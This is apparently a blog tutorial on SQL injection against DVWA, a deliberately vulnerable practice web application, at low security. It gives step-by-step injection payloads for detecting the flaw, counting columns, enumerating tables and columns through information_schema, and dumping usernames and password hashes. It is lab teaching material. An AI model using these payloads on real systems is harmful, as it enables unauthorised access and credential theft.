DVWA ( Damn Vulnerable Web Application ) lets you practise some of the web application security concepts legally, that is setup on you own machine and lets you decide the level of security which you will be breaking.
Those who are reading it most probably already know What is DVWA and how to host it on your own machine, where to start and other things, so without taking much time we will start with SQL Injection
How to Setup DVWA Pentest Lab – https://ethicalhackx.com/how-to-host-dvwa-pentest-lab-on-wamp-server/
DVWA Brute Force : Low Security – https://ethicalhackx.com/dvwa-brute-force-low-security-burp-suite/
First let’s have a look at code which is causing the vulnerability, I mean the reason behind all the Injection possibilities, it will be better if you figure this out and compare the different versions -low, medium and high security. Find out whats the difference.
Click on view-source button at Right-Bottom on SQL-Injection Page in DVWA to open the source in new window.
Step by Step : SQL Injection
I have made a short video on same showing each steps below, check this out
Step 1: Input Field is Vulnerable ?
Yes it is but how to know that ? How to check ?
Throw some input to the field to see what output we get. Lets first go with 1
User Input in Field: 1
The Output we got says – ID, First Name, Last Name.
User Input in Field: 1'
The field is vulnerable to SQL Injection, so lets start digging information.
Step 2 : How many Columns are there ?
We now find out how many columns are there , and we do this with order by.
User Input in Field: 1' order by 1-- - 1' order by 1 # 1' order by 2 # 1' order by 3 #
So we have Column 1,2 but when you try for Column 3, we face error that – Unknown column ‘3’ in ‘order clause’
Step 3 : Fetch the Data.
User Input in Field: 1' union select 1,2 #
Step 4: Getting more details like database name, version etc.
We can replace – “1′ union select 1,2 #” “1” and “2” with SQL Understandable inputs to get the desired output. We hence try few things.
Getting database name:
User Input in Field: 1' union select null,database() #
Getting The database Version :
User Input in Field: 1' union select null,version() #
Getting The user name :
User Input in Field: 1' union select null,user() #
Getting the Table Names
User Input in Field: 1' union select null,table_name from information_schema.tables #
We got a list of Tables present, any useful information here ? When you scroll the page you might find few very interesting entries like – admin, users, USER_PRIVILEGES. Basically depends on what you are looking for. I am happy in digging more about users table.
NOTE: I have increased input form field width to make it visible at few places, its not actual size what you see in screenshots here.
User Input in Field: 1' union select null,table_name from information_schema.tables where table_name like 'user%'#
We have listed tables which have User in name like users, users_groups, users_permissions
Now we get the column names from table- users
User Input in Field: 1' union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users' #
This gives us column names in user table like – user_id, first_name, last_name, user, password, avatar
User Input in Field: 1' union select null, concat(user_id,0x0a,first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
So we finally got the User details like user_id, first and last name, password(hash) from the user database.
User Input in Field: 1' or 1=1 # 1' or '1'=1 # 1' or 1=1-- -
So this was all about DVWA SQL Injection at Low Security. We learnt how we can get details like user_name and passwords. The purpose was to show
How to check if input field is vulnerable ?
How to get table and column names ?
How to get columns (data) from required columns and tables ?
In upcoming articles we will do same with DVWA Medium and High Security, as well with other vulnerable Web Application Frameworks like bwapp and more.